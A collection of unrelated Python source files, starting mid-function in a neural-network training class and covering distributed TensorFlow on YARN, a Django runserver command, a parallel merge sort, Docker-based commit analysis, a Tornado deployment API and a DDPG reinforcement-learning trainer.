id_file: ANNTreeIdType, /) -> Iterable[TrainNNStatsElementType]:
if self.arguments_con.hyper_optim_wr is None:
raise KnownSimpleAnnError("Hyper-optimiser is not defined!")
generator_optim = self.arguments_con.hyper_optim_wr.hyper.hyper_optim(
sync_out, hyper_cont
)
try:
l_new_params: List[Dict[str, HyperOptimReturnElem]] = next(generator_optim)
except StopIteration:
raise KnownSimpleAnnError("Generator could not be started!")
while run_cont.running:
tr_fit: _TrFitAl = ([], [])
trainer_args = []
for param_id, new_param in enumerate(l_new_params):
run_cont.hyper_cont_buffer = deepcopy(hyper_cont)
self.arguments_con.prepare_wr.init_prepare()
self._update_hyper_run(run_cont.hyper_cont_buffer, new_param)
yield from self.arguments_con.prepare_wr.prepare.run_train(
sync_out, PrepareInterfaceArgs(
trainer=deepcopy(self.arguments_con.trainer_wr.trainer),
trainer_args=self._create_train_interface(
id_file, False, str(run_cont.run_id + param_id)
)
)
)
re_copy_model(
self.arguments_con.prepare_wr.prepare.p_state_dict,
self.get_savable_net().get_net_com
)
tr_fit_res = self.arguments_con.prepare_wr.prepare.fitness
tr_fit[0].append((tr_fit_res[0], _create_hyper_params(run_cont.hyper_cont_buffer)))
tr_fit[1].append(tr_fit_res[1])
trainer_args.append(run_cont.hyper_cont_buffer)
self.get_savable_net().update_current_net(tr_fit_res[0])
run_cont.fit_plotter.update_fitness(tr_fit, trainer_args)
self._update_hyper(hyper_cont, run_cont.fit_plotter.bets_fit_h_param[1])
l_new_params = self._get_new_params(generator_optim, tr_fit[0], run_cont)
yield from run_cont.fit_plotter.plot(
not run_cont.running,
self.arguments_con.net_state.get_kwargs().dump,
run_cont.run_id
)
run_cont.run_id += len(tr_fit[0])
def _train_parallel(self, sync_out: SyncStdoutInterface, run_cont: _RunningConst,
hyper_cont: HyperOptimInterfaceArgs,
id_file: ANNTreeIdType, /) -> Iterable[TrainNNStatsElementType]:
if self.arguments_con.hyper_optim_wr is None:
raise KnownSimpleAnnError("Hyper-optimiser is not defined!")
run_cont.init()
run_cont.start()
self._move_data_sets_to_shared_memory(run_cont.smm)
generator_optim = self.arguments_con.hyper_optim_wr.hyper.hyper_optim(
sync_out, hyper_cont
)
try:
l_new_params: List[Dict[str, HyperOptimReturnElem]] = next(generator_optim)
except StopIteration:
raise KnownSimpleAnnError("Generator could not be started!")
while run_cont.running:
tr_fit: _TrFitAl = ([], [])
trainer_args: _TrainArgs = []
for param_id, new_param in enumerate(l_new_params):
run_cont.hyper_cont_buffer = deepcopy(hyper_cont)
self._update_hyper_run(run_cont.hyper_cont_buffer, new_param)
trainer_args.append((
self._create_train_interface(
id_file, True, str(run_cont.run_id + param_id)
), run_cont.hyper_cont_buffer,
deepcopy(self.arguments_con.trainer_wr.trainer),
deepcopy(self.arguments_con.prepare_wr.prepare)
))
yield from _optimise_in_parallel(
sync_out, self.arguments_con.net_state.get_kwargs().process,
trainer_args, tr_fit
)
for erg_index, erg_tuple in enumerate(tr_fit[0]):
self.get_savable_net().merge_net_model(trainer_args[erg_index][0].module)
self.get_savable_net().update_current_net(erg_tuple[0])
run_cont.fit_plotter.update_fitness(tr_fit, [tr_ar[1] for tr_ar in trainer_args])
self._update_hyper(hyper_cont, run_cont.fit_plotter.bets_fit_h_param[1])
l_new_params = self._get_new_params(generator_optim, tr_fit[0], run_cont)
yield from run_cont.fit_plotter.plot(
not run_cont.running,
self.arguments_con.net_state.get_kwargs().dump,
run_cont.run_id
)
run_cont.run_id += len(tr_fit[0])
run_cont.shutdown()
def train_net(self, id_file: ANNTreeIdType, sync_out: SyncStdoutInterface, /) -> \
Iterable[TrainNNStatsElementType]:
if self.is_trainable():
hyper_cont = create_hyper_arguments(self.arguments_con)
if self.arguments_con.hyper_optim_wr is not None:
self.stop_file_set(self._create_stop_file(id_file))
run_cont = _RunningConst(
fit_plotter=_SimpleTrainDataP(hyper_cont, deepcopy(id_file)),
hyper_cont_buffer=deepcopy(hyper_cont),
init_time=time.time()
)
if self.check_net_state().get_kwargs().process > 1:
yield from self._train_parallel(sync_out, run_cont, hyper_cont, id_file)
else:
yield from self._train_single(sync_out, run_cont, hyper_cont, id_file)
else:
update_hyper_params(
self.get_savable_net(), self.arguments_con, _create_hyper_params(hyper_cont)
)
yield from self.arguments_con.prepare_wr.prepare.run_train(
sync_out, PrepareInterfaceArgs(
trainer=self.arguments_con.trainer_wr.trainer,
trainer_args=self._create_train_interface(id_file, False, "")
)
)
re_copy_model(
self.arguments_con.prepare_wr.prepare.p_state_dict,
self.get_savable_net().get_net_com
)
self.get_savable_net().update_current_net(
self.arguments_con.prepare_wr.prepare.fitness[0]
)
self.get_savable_net().set_best_net()
def test_net(self, id_file: ANNTreeIdType, sync_out: SyncStdoutInterface, /) \
-> Tuple[TestNNStatsElementType, ...]:
module_net = self.get_savable_net()
return self.arguments_con.tester_wr.tester.test(
sync_out,
TesterInterfaceArgs(
module=module_net,
input_test=self.test_data,
id_file=deepcopy(id_file),
cuda=self.arguments_con.net_state.get_kwargs().cuda,
truth_fun_id=self.get_truth_fun_id()
)
)
@final
def finalize(self) -> None:
self.__data_container.eval_data = None
self.__data_container.train_data = None
self.__data_container.test_data = None
self.__data_container.stop_op_fp = None
|
__init__.py
|
# Copyright 2018 Criteo
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hashlib
import logging
import os
import time
import typing
from contextlib import suppress, contextmanager
from enum import Enum
from sys import version_info as v
from tempfile import NamedTemporaryFile
from threading import Thread
import dill
import skein
import tensorflow as tf
from skein.exceptions import SkeinError
from skein.model import FinalStatus, ApplicationReport
from ._criteo import get_default_env
from ._internal import (
dump_fn,
iter_tasks,
zip_inplace,
StaticDefaultDict,
create_and_pack_conda_env
)
__all__ = [
"Experiment",
"run_on_yarn", "RunFailed", "NodeLabel", "TaskSpec",
]
logger = logging.getLogger(__name__)
here = os.path.dirname(__file__)
class Experiment(typing.NamedTuple):
estimator: tf.estimator.Estimator
train_spec: tf.estimator.TrainSpec
eval_spec: tf.estimator.EvalSpec
# TODO: experiment name?
@property
def config(self) -> tf.estimator.RunConfig:
return self.estimator.config
ExperimentFn = typing.Callable[[], Experiment]
class NodeLabel(Enum):
"""YARN node label expression.
A task with a CPU label could be scheduled on any node, whereas
a task with a GPU label, only on the one labeled with ``"gpu"``.
"""
CPU = "" # Default.
GPU = "gpu"
class TaskSpec(typing.NamedTuple):
memory: int
vcores: int
instances: int = 1
label: NodeLabel = NodeLabel.CPU
#: A "dummy" ``TaskSpec``.
TaskSpec.NONE = TaskSpec(0, 0, 0)
class RunFailed(Exception):
"""``run_on_yarn`` failed."""
def run_on_yarn(
experiment_fn: ExperimentFn,
task_specs: typing.Dict[str, TaskSpec],
*,
python: str = f"{v.major}.{v.minor}.{v.micro}",
pip_packages: typing.List[str] = None,
files: typing.Dict[str, str] = None,
env: typing.Dict[str, str] = None,
queue: str = "default",
file_systems: typing.List[str] = None
) -> None:
"""Run an experiment on YARN.
The implementation allocates a service with the requested number
of instances for each distributed TensorFlow task type. Each
instance runs ``_dispatch_task`` which roughly does the following.
1. Reserve a TCP port and communicate the resulting socket address
(host/port pair) to other instances using the "init" barrier.
2. Spawn ``train_and_evaluate`` in a separate thread.
3. Synchronize the "ps" tasks on the "stop" barrier.
The barrier compensates for the fact that "ps" tasks never
terminate, and therefore should be killed once all other
tasks are finished.
Parameters
----------
experiment_fn
A function constructing the estimator alongside the train
and eval specs.
task_specs
Resources to allocate for each task type. The keys
must be a subset of ``"chief"``, ``"worker"``, ``"ps"``, and
``"evaluator"``. The minimal spec must contain at least
``"chief"``.
python
Python version in the MAJOR.MINOR.MICRO format. Defaults to the
version of ``sys.executable``.
pip_packages
Python packages to install in the environment. The packages
are installed via pip, therefore all of the following forms
are supported::
SomeProject>=1,<2
git+https://github.com/org/SomeProject
http://SomeProject.org/archives/SomeProject-1.0.4.tar.gz
path/to/SomeProject
See `Installing Packages <https://packaging.python.org/tutorials \
/installing-packages>`_ for more examples.
files
Local files or directories to upload to the container.
The keys are the target locations of the resources relative
to the container root, while the values -- their
corresponding local sources. Note that container root is
appended to ``PYTHONPATH``. Therefore, any listed Python
module a package is automatically importable.
env
Environment variables to forward to the containers.
queue
YARN queue to use.
file_systems
A list of namenode URIs to acquire delegation tokens for
in addition to ``fs.defaultFS``.
Raises
------
RunFailed
If the final status of the YARN application is ``"FAILED"``.
"""
# TODO: compute num_ps from the model size and the number of
# executors. See https://stackoverflow.com/a/46080567/262432.
task_specs = StaticDefaultDict(task_specs, default=TaskSpec.NONE)
_check_task_specs(task_specs)
task_files = _maybe_zip_task_files(files or {})
task_files[__package__] = zip_inplace(here, replace=True)
with NamedTemporaryFile(suffix=".dill", delete=False) as file:
dump_fn(experiment_fn, file.name)
task_files["experiment_fn.dill"] = file.name
task_env = {
# XXX this is Criteo-specific. Remove once Lake updates the
# container environment. See LAKE-709.
**get_default_env(),
**(env or {}),
# Make Python modules/packages passed via ``files`` importable.
"PYTHONPATH": ".:" + (env or {}).get("PYTHONPATH", ""),
}
pyenvs = _make_conda_envs(python, pip_packages or [])
services = {}
for task_type, task_spec in list(task_specs.items()):
task_command = (
f"pyenv/bin/python -m tf_yarn._dispatch_task "
f"--num-ps={task_specs['ps'].instances} "
f"--num-workers={task_specs['worker'].instances} "
"--experiment-fn=experiment_fn.dill"
)
services[task_type] = skein.Service(
[task_command],
skein.Resources(task_spec.memory, task_spec.vcores),
max_restarts=0,
instances=task_spec.instances,
node_label=task_spec.label.value,
files={**task_files, "pyenv": pyenvs[task_spec.label]},
env=task_env)
tasks = list(iter_tasks(
task_specs["worker"].instances,
task_specs["ps"].instances))
if "evaluator" in task_specs:
tasks.append("evaluator:0") # Not part of the cluster.
spec = skein.ApplicationSpec(services, queue=queue, name_nodes=file_systems)
with skein.Client() as client:
_submit_and_await_termination(client, spec, tasks)
def _check_task_specs(task_specs):
all_task_types = {"chief", "worker", "ps", "evaluator"}
if not task_specs.keys() <= all_task_types:
raise ValueError(
f"task_specs.keys() must be a subset of: {all_task_types}")
if task_specs["chief"].instances != 1:
raise ValueError("exactly one 'chief' task is required")
if task_specs["evaluator"].instances > 1:
raise ValueError("no more than one 'evaluator' task is allowed")
if task_specs["worker"].instances > 0 and not task_specs["ps"].instances:
raise ValueError(
"task_specs must contain at least a single 'ps' task for "
"multi-worker training")
def _maybe_zip_task_files(files):
task_files = {}
for target, source in files.items():
assert target not in task_files
if os.path.isdir(source):
source = zip_inplace(source, replace=True)
task_files[target] = source
return task_files
def _make_conda_envs(python, pip_packages) -> typing.Dict[NodeLabel, str]:
fp = hashlib.md5(str(pip_packages).encode()).hexdigest()
base_packages = [
"dill==" + dill.__version__,
"git+http://github.com/criteo-forks/skein"
]
# TODO: use internal PyPI for CPU-optimized TF.
# TODO: make the user responsible for constructing this mapping.
return {
NodeLabel.CPU: create_and_pack_conda_env(
f"py{python}-{fp}-cpu",
python,
pip_packages + base_packages + ["tensorflow==" + tf.__version__]
),
NodeLabel.GPU: create_and_pack_conda_env(
f"py{python}-{fp}-gpu",
python,
pip_packages + base_packages + [
"tensorflow-gpu==" + tf.__version__
]
)
}
@contextmanager
def _shutdown_on_exception(app: skein.ApplicationClient):
# Ensure SIGINT is not masked to enable kill on C-c.
import signal
signal.signal(signal.SIGINT, signal.default_int_handler)
try:
yield
except (KeyboardInterrupt, SystemExit):
with suppress(SkeinError):
app.shutdown(FinalStatus.KILLED)
logger.error("Application killed on user request")
except Exception:
with suppress(SkeinError):
app.shutdown(FinalStatus.FAILED)
logger.exception("Application shutdown due to an exception")
raise
def _submit_and_await_termination(
client: skein.Client,
spec: skein.ApplicationSpec,
tasks: typing.List[str],
poll_every_secs: int = 10
):
app = client.submit_and_connect(spec)
events = {task: {} for task in tasks}
event_listener = Thread(target=_aggregate_events, args=(app.kv, events))
event_listener.start()
with _shutdown_on_exception(app):
state = None
while True:
report = client.application_report(app.id)
logger.info(
f"Application report for {app.id} (state: {report.state})")
if state != report.state:
logger.info(_format_app_report(report))
if report.final_status != "undefined":
event_listener.join()
logger.info(_format_run_summary(events))
if report.final_status == "failed":
raise RunFailed
else:
break
time.sleep(poll_every_secs)
state = report.state
def _format_app_report(report: ApplicationReport) -> str:
attrs = [
"queue",
"start_time",
"finish_time",
"final_status",
"tracking_url",
"user"
]
return os.linesep + os.linesep.join(
f"{attr:>16}: {getattr(report, attr) or ''}" for attr in attrs)
def _aggregate_events(
kv: skein.kv.KeyValueStore,
events: typing.Dict[str, typing.Dict[str, str]]
) -> None:
"""
Aggregate events from all dispatched tasks.
The lifecycle of a task consists of three stages:
* init which carries the reserved socket address,
* start with no payload, and
* stop with an optional formatted exception.
"""
# ``ConnectionError`` indicates that the app has finished and
# the AM is down.
queue = kv.events(event_type="PUT")
with suppress(skein.exceptions.ConnectionError), queue:
for event in queue:
task, stage = event.key.rsplit("/", 1)
events[task][stage] = event.result.value.decode()
def _format_run_summary(
events: typing.Dict[str, typing.Dict[str, str]]
) -> str:
header = []
details = []
for task, stages in sorted(events.items()):
if "stop" in stages:
status = "FAILED" if stages["stop"] else "SUCCEEDED"
elif stages:
status = "KILLED"
else:
# No events -- container was never started.
status = "REQUESTED"
sock_addr = stages.get("init", "")
exception = stages.get("stop", "")
header.append(f"{task:>16} {sock_addr} {status}")
if exception:
details.append(f"Exception in task {task}:")
details.append(exception)
return (os.linesep + os.linesep.join(header)
+ os.linesep * (1 + bool(details))
+ os.linesep.join(details))
|
runserver.py
|
from __future__ import print_function
import atexit
import os
import psutil
import subprocess
import sys
import traceback
from signal import SIGTERM
from threading import Thread
from django.contrib.staticfiles.management.commands.runserver import Command as RunserverCommand
from django.core.management.base import CommandError
from django.core.servers import basehttp
class Command(RunserverCommand):
"""
Subclass the RunserverCommand from Staticfiles to run browserify.
"""
def __init__(self, *args, **kwargs):
self.cleanup_closing = False
self.browserify_process = None
super(Command, self).__init__(*args, **kwargs)
def handle(self, *args, **options):
# We're subclassing runserver, which spawns threads for its
# autoreloader with RUN_MAIN set to true, we have to check for
# this to avoid running browserify twice.
if not os.getenv('RUN_MAIN', False) and not getattr(self, "browserify_process"):
browserify_thread = Thread(target=self.start_browserify)
browserify_thread.daemon = True
browserify_thread.start()
atexit.register(self.kill_browserify_process)
return super(Command, self).handle(*args, **options)
def kill_browserify_process(self):
if self.browserify_process.returncode is not None:
return
self.cleanup_closing = True
self.stdout.write('Closing browserify process')
self.browserify_process.terminate()
def start_browserify(self):
self.stdout.write('Starting browserify')
self.browserify_process = subprocess.Popen(
'node ../build.js --watch --debug',
shell=True,
stdin=subprocess.PIPE,
stdout=self.stdout,
stderr=self.stderr)
if self.browserify_process.poll() is not None:
raise CommandError('Browserify failed to start')
self.stdout.write('Browserify process on pid {0}'
.format(self.browserify_process.pid))
self.browserify_process.wait()
if self.browserify_process.returncode != 0 and not self.cleanup_closing:
self.stdout.write(
"""
****************************************************************************
Browserify exited unexpectedly - Javascript code will not be properly built.
****************************************************************************
""")
|
threading_simple.py
|
#!/usr/bin/env python
# encoding: UTF-8
import threading
def worker():
print'Worker'
return
threads=[]
for i in range(5):
t=threading.Thread(target=worker)
threads.append(t)
t.start()
|
permission_controllers.py
|
import random
from builtins import callable, getattr
from multiprocessing import Manager, Pool, Process
class PraxoPermission:
def _permission_controller_forsure(self, user_obj, **kwargs):
l = []
print(kwargs)
for key, value in kwargs.items():
if callable(getattr(user_obj, 'has_perm')):
print("{0}.{1}".format(key,value))
l.append(user_obj.has_perm("{0}.{1}".format(key,value)))
else: l.append(False)
print("in _permission_controller_forsure and result is:")
print(l)
def general_permission_controller(user, **kwargs):
p = PraxoPermission()
p._permission_controller_forsure(user, **kwargs)
from rest_framework.permissions import IsAuthenticated
class RestFrameworkPermissionController(IsAuthenticated):
def has_permission(self, request, view):
resp = super(RestFrameworkPermissionController, self).has_permission(request, view)
print('Inside RestFrameworkPermissionController and user is: {0}, {1}'.format(request.user, request.user.is_superuser))
roles = request.user.roles.all()
if roles:
for role in request.user.roles.all():
if 4 == role.role_id or request.user.is_superuser:
if request.user.is_active and resp:
return True
else:
if request.user.is_superuser and request.user.is_active and resp:
return True
return False
# return getattr(request.user, "user_type", None) == "A" and resp
# Multiproccesing implemented and tested.
# For this kind of cases, Multiprocessing is not usual and handy.
# Using following version of implementation just because of using multiprocessing
# Gets error. Having it here commented, help us not to test it one more time again.
# Just in case anyone may assume importing these can solve the problem
# from django.contrib.auth.models import User
# from healthrecords import models
# from healthstandards import models
# from commons import models as model1
# def _permission_controller(user, **kwargs):
# p = Pool()
# result = p.starmap(_check_permission, user, kwargs)
# print(result)
# def _check_permission(user_obj, app, perm, res):
# print('here4')
# if callable(getattr(user_obj, has_perm)):
# print("{0}.{1}".format(app,perm))
# res.append(user_obj.has_perm("{0}.{1}".format(app,perm)))
# else: res.append(False)
# print("in _check_permission and params are: {0}, {1}".format(app, perm))
# def _permission_controller(user_obj, **kwargs):
# manager = Manager()
# d = manager.dict(**kwargs)
# l, jobs, i = [], [], 0
# print(kwargs)
# for key, value in kwargs.items():
# print('here')
# p = Process(target=_check_permission, args=(user_obj.id, key, value, l))
# print('here1')
# jobs.append(p)
# print('here2')
# p.start()
# print('here3')
# for proc in jobs:
# print(proc)
# proc.join()
# print("in _permission_controller and result is:")
# print(l)
|
Parallel_MergeSort.py
|
#!/usr/bin/env python3
""" Merge Sort Algorithm for Sort an array of random integers with parallel and sequential apporach is used."""
import random
import math
import multiprocessing as mp
""" helper method to merge two sorted subarrays
array[l..m] and array[m+1..r] into array """
def merge(array, left, mid, right):
# copy data to temp subarrays to be merged
left_temp_arr = array[left:mid+1].copy()
right_temp_arr = array[mid+1:right+1].copy()
# initial indexes for left, right and merged subarrays
left_temp_index = 0
right_temp_index = 0
merge_index = left
# merge temp arrays into original
while (left_temp_index < (mid - left + 1) or right_temp_index < (right - mid)):
if (left_temp_index < (mid - left + 1) and right_temp_index < (right - mid)):
if (left_temp_arr[left_temp_index] <= right_temp_arr[right_temp_index]):
array[merge_index] = left_temp_arr[left_temp_index]
left_temp_index += 1
else:
array[merge_index] = right_temp_arr[right_temp_index]
right_temp_index += 1
elif (left_temp_index < (mid - left + 1)): # copy any remaining on left side
array[merge_index] = left_temp_arr[left_temp_index]
left_temp_index += 1
elif (right_temp_index < (right - mid)): # copy any remaining on right side
array[merge_index] = right_temp_arr[right_temp_index]
right_temp_index += 1
merge_index += 1
""" parallel implementation of merge sort """
def parallel_mergesort(array, *args):
if not args: # first call
shared_array = mp.RawArray('i', array)
parallel_mergesort(shared_array, 0, len(array)-1, 0)
array[:] = shared_array # insert result into original array
return array
else:
left, right, depth = args
if (left < right):
mid = left + ((right - left) // 2)
left_proc = mp.Process(target=parallel_mergesort, args=(array, left, mid, depth+1))
left_proc.start()
parallel_mergesort(array, mid+1, right, depth+1)
left_proc.join()
merge(array, left, mid, right)
if __name__ == '__main__':
NUM_EVAL_RUNS = 1
userRange = int(input("Enter your range for generating random array: "))
print('Generating Random Array...')
array = [random.randint(0,10_000) for i in range(userRange)]
strRandomArray = ','.join([str(i) for i in array])
print('Random Array to Sort is : ' + strRandomArray)
print('Evaluating Parallel Implementation...')
parallel_result = parallel_mergesort(array.copy())
for i in range(NUM_EVAL_RUNS):
parallel_mergesort(array.copy())
strfinalSortResult =','.join([str(i) for i in parallel_result])
print('final Parallel approach sorted array is : '+ strfinalSortResult)
# input/output sample
# Enter your range for generating random array: 10
# Generating Random Array...
# Random Array to Sort is : 1807,7508,7166,7673,2000,1356,7665,4670,9395,6002
# Evaluating Parallel Implementation...
# final sorted array is : 1356,1807,2000,4670,6002,7166,7508,7665,7673,9395
# Time Complexity: O(nLog(n)) in worst case
#Space Complexity: O(n) in worst case
|
assemble_features.py
|
"""
Script that runs several docker containers which in turn runs an analysis on
a git repository.
"""
__author__ = "Oscar Svensson"
__copyright__ = "Copyright (c) 2018 Axis Communications AB"
__license__ = "MIT"
import os
import sys
import shutil
import time
from argparse import ArgumentParser
from distutils.dir_util import copy_tree
from multiprocessing import Process, cpu_count
from git import Repo
from tqdm import tqdm
import docker
def start_container(client, image, name, repo_dir, result_dir):
"""
Function that starts a docker container and links the repo into it and
a directory where the results are stored.
"""
for container in client.containers.list(all=True):
if name == container.name:
if container.status == "running":
container.kill()
container.remove()
path = os.path.abspath('./')
container = client.containers.run(
image,
name=name,
stdin_open=True,
detach=True,
volumes={
str(path + "/scripts"): {
'bind': '/root/scripts',
'mode': 'rw'
},
result_dir: {
'bind': '/root/results',
'mode': 'rw'
},
os.path.abspath(repo_dir): {
'bind': '/root/repo',
'mode': 'rw'
}
},
command="bash")
return container
def run_command(container, command):
"""
Function that executes a command inside a container.
"""
return container.exec_run(
cmd="bash -c \"" + command + "\"", tty=True, privileged=True)
def run_analysis(t_id, container, commits):
"""
Function that runs a command inside all docker container.
"""
for commit in tqdm(
commits, desc="Progress process {}".format(t_id), position=t_id):
run_command(container,
"/root/scripts/analyse_commit {}".format(commit))
def copy_repo(src, dest):
"""
Helper function to copy a repository to another destination.
"""
try:
shutil.copytree(src, dest)
except shutil.Error as exp:
print("Directory not copied. Error: {}".format(exp))
except OSError as exp:
print("Directory not copied. Error: {}".format(exp))
def partion_commits(commits, partitions):
"""
Function that divides commits into evenly partitions.
"""
quote, remainder = divmod(len(commits), partitions)
chunk_commits = [(i * quote + min(i, remainder), (i + 1) * quote + min(i + 1, remainder) - 1)
for i in range(partitions)]
chunk_commits[-1] = (chunk_commits[-1][0], chunk_commits[-1][1] + 1)
commits = [[commit for commit in commits[chunk[0]:chunk[1]]]
for chunk in chunk_commits]
return commits
def start_analysis(image, result_dir, commits=None, cpus=cpu_count()):
"""
This function starts a docker container that can analyze a git repository. It starts several
containers if the cpus are more than one.
"""
client = docker.from_env()
repo = Repo(REPO)
# Since the script is working directly on the repository, they have
# to have a separately copy.
if not os.path.exists("./repos"):
os.makedirs("./repos")
repo_name = os.path.basename(os.path.normpath(REPO))
for cpu in range(cpus):
copy_repo(REPO, "./repos/{}{}".format(repo_name, cpu))
# Split the commits into even parts.
if not commits:
commits = [
str(commit.hexsha) for commit in list(repo.iter_commits('master'))
]
commits = partion_commits(commits, cpus)
containers = []
for cpu in range(cpus):
container = start_container(
client,
image=image,
name="analysis_{}_cpu_{}".format(repo_name, cpu),
repo_dir="./repos/{}{}".format(repo_name, cpu),
result_dir=result_dir + "/data{}".format(cpu))
containers.append(container)
processes = [
Process(target=run_analysis, args=(i, containers[i], commits[i]))
for i in range(cpus)
]
for process in processes:
process.start()
for process in processes:
process.join()
for container in containers:
print(container.status)
print(container.name)
if (container.status != "exited" or container.status != "dead"):
container.kill()
container.remove()
shutil.rmtree("./repos", ignore_errors=True)
def parse_commits(commit_file):
"""
Read the commits from a file and reutrn the content.
"""
if not os.path.exists(commit_file):
print("commit_file doesn't exist!!", file=sys.stderr)
sys.exit(1)
commits = []
with open(commit_file, 'r') as cfile:
commits = [line.strip() for line in cfile.readlines()]
return commits
def assemble_directories(result_path, cpus=cpu_count()):
"""
Copy all results into a single directory.
"""
result_path = os.path.abspath(result_path)
paths = ["{}/data{}".format(result_path, i) for i in range(cpus)]
if not all([os.path.exists(p) for p in paths]):
print("data paths doesn't exists!", file=sys.stderr)
return
files = []
for path in paths:
for item in os.listdir(path):
commit = os.path.join(path, item)
corrupt = False if (len(os.listdir(commit)) == 2) else True
if (os.path.isdir(commit) and not corrupt):
files.append((commit, item))
print("Saving all analysed commits into a single directory: {}/data_all".
format(result_path))
if not os.path.exists("{}/data_all".format(result_path)):
os.makedirs("{}/data_all".format(result_path))
for file_tuple in files:
if not os.path.exists("{}/data_all/{}".format(result_path, file_tuple[1])):
copy_tree(file_tuple[0], "{}/data_all/{}".format(result_path, file_tuple[1]))
def check_for_missing_commits(repo_path, result_path):
"""
Controller function that checks if all commits has been analyzed.
"""
result_dir = os.path.abspath(result_path)
if not os.path.exists(result_path):
print("Result path doesn't exist!", file=sys.stderr)
return
repo = Repo(repo_path)
current_commits = []
for item in os.listdir(result_dir):
current_commits.append(item)
all_repo_commits = [c.hexsha for c in list(repo.iter_commits('master'))]
missing_commits = set(all_repo_commits) - set(current_commits)
if missing_commits:
with open("./missing_commits.txt", 'w') as cfile:
for commit in missing_commits:
cfile.write(commit)
cfile.write('\n')
print("Wrote missing commits to missing_commits.txt")
if __name__ == "__main__":
PARSER = ArgumentParser(description="Utility to run several docker " +
"containers onto a git repository. " +
"Each container is given a set of " +
"commits and is instructed to run " +
"an analysis on each one of them.")
PARSER.add_argument(
"--analyse", "-a", action="store_true", help="Run an analysation.")
PARSER.add_argument(
"--image",
"-i",
type=str,
default="code-maat",
help="Specification of which image to use.")
PARSER.add_argument(
"--repo-dir",
"-r",
type=str,
default="../../jenkins",
help="Specification of which repo to use.")
PARSER.add_argument(
"--result-dir",
"-rd",
type=str,
default="/h/oskars",
help="Specification of where to store the result.")
PARSER.add_argument(
"--commits",
"-c",
type=str,
default=None,
help="Direction to a file containing commits to analyse.")
PARSER.add_argument(
"--assemble",
"-as",
action="store_true",
help="Assemble the results into a single directory.")
PARSER.add_argument(
"--missing-commits",
"-mc",
action="store_true",
help="Check for non analysed commits.")
ARGS = PARSER.parse_args()
global REPO
REPO = os.path.abspath(ARGS.repo_dir)
if ARGS.commits:
COMMITS = parse_commits(ARGS.commits)
else:
COMMITS = []
CLIENT = docker.from_env()
if ARGS.analyse:
print("Starting the analysis using {} cpus...".format(cpu_count()))
START = time.time()
if COMMITS:
start_analysis(ARGS.image, ARGS.result_dir, commits=COMMITS)
else:
start_analysis(ARGS.image, ARGS.result_dir)
STOP = time.time()
print("Done in {}".format(
time.strftime('%H:%M:%S', time.gmtime(STOP - START))))
print("Results can be found in {}".format(
ARGS.result_dir + "/data{" +
','.join(["{}".format(i) for i in range(cpu_count())]) + "}"))
if ARGS.assemble:
assemble_directories(ARGS.result_dir)
if ARGS.missing_commits:
check_for_missing_commits(ARGS.repo_dir, ARGS.result_dir)
|
lcm_api.py
|
import json
import uuid
import threading
import tornado.web
from app.service import token_service
from app.domain.task import Task
from app.domain.deployment import Deployment
from app.service import umm_client
from app.service import lcm_service
from app.utils import mytime
class LcmApi(tornado.web.RequestHandler):
def put(self, action, *args, **kwargs):
token = token_service.get_token(self.request)
user_login = token.username
has_role = token.has_role('ROLE_OPERATOR')
deployment = Deployment()
req = json.loads(str(self.request.body, encoding='utf-8'))
if action == 'change':
deployment.__dict__ = req['deployment']
else:
deployment.__dict__ = req
if user_login is None or (not has_role and user_login != deployment.deployer):
self.send_error(403)
return
if action == 'change':
if lcm_service.change(deployment, req['resource'], req['lcm']) is None:
self.send_error(500)
return
self.finish()
return
task = Task()
task.uuid = str(uuid.uuid4()).replace('-', '')
task.userLogin = user_login
task.taskStatus = '等待调度'
task.taskProgress = 0
task.targetUuid = deployment.uuid
task.startDate = mytime.now()
if action == 'stop':
task.taskType = '实例停止'
task.taskName = '实例停止-' + deployment.solutionName
action_service = lcm_service.stop
else:
self.send_error(400)
return
try:
umm_client.create_task(task, jwt=token.jwt)
except:
self.send_error(500)
thread = threading.Thread(target=action_service, args=(task.uuid, deployment))
thread.setDaemon(True)
thread.start()
self.finish()
async def get(self, action):
token = token_service.get_token(self.request)
user_login = token.username
has_role = token.has_role('ROLE_OPERATOR')
deployment_uuid = self.get_argument('uuid', None)
user = self.get_argument('user', None)
if user_login is None or (not has_role and user_login != user):
self.send_error(403)
return
if action == 'status':
res = await lcm_service.status(user, deployment_uuid)
res = res.__dict__
elif action == 'logs':
res = await lcm_service.logs(user, deployment_uuid)
else:
self.send_error(400)
return
if res is None:
self.send_error(403)
return
self.write(json.dumps(res))
|
ddpg_trainer.py
|
from __future__ import absolute_import
from builtins import object
import logging
import numpy as np
import six.moves.queue as queue
import threading
from relaax.common import profiling
from relaax.server.common import session
from relaax.common.algorithms.lib import episode
from relaax.common.algorithms.lib import observation
from relaax.common.algorithms.lib import utils
from . import ddpg_config as cfg
from . import ddpg_model
logger = logging.getLogger(__name__)
profiler = profiling.get_profiler(__name__)
class Trainer(object):
def __init__(self, parameter_server, metrics, exploit, hogwild_update):
self.exploit = exploit
self.ps = parameter_server
self.metrics = metrics
model = ddpg_model.AgentModel()
self.session = session.Session(model)
self.episode = episode.ReplayBuffer(['state', 'action', 'reward', 'terminal', 'next_state'],
cfg.config.buffer_size, seed=cfg.config.exploration.rnd_seed)
self.episode.begin()
self.observation = observation.Observation(cfg.config.input.history)
self.last_action = self.noise_epsilon = None
self.episode_cnt = self.cur_loop_cnt = 0
self.exploration_noise = utils.OUNoise(cfg.config.output.action_size,
cfg.config.exploration.ou_mu,
cfg.config.exploration.ou_theta,
cfg.config.exploration.ou_sigma,
cfg.config.exploration.rnd_seed)
self.max_q = self.step_cnt = 0
self.agent_weights_id = 0
self.terminal = False
if hogwild_update:
self.queue = queue.Queue(10)
threading.Thread(target=self.execute_tasks).start()
self.receive_experience()
else:
self.queue = None
if cfg.config.use_filter:
shape = cfg.config.input.shape
if shape == [0]:
shape = [1]
self.filter = utils.ZFilter(shape)
if cfg.config.no_ps:
self.session.op_initialize()
self.session.op_init_target_weights()
@property
def experience(self):
return self.episode.experience
@profiler.wrap
def begin(self):
self.do_task(self.receive_experience)
self.terminal = False
self.episode_cnt = self.ps.session.op_get_episode_cnt()
self.exploration_noise.reset(self.episode_cnt + cfg.config.exploration.rnd_seed)
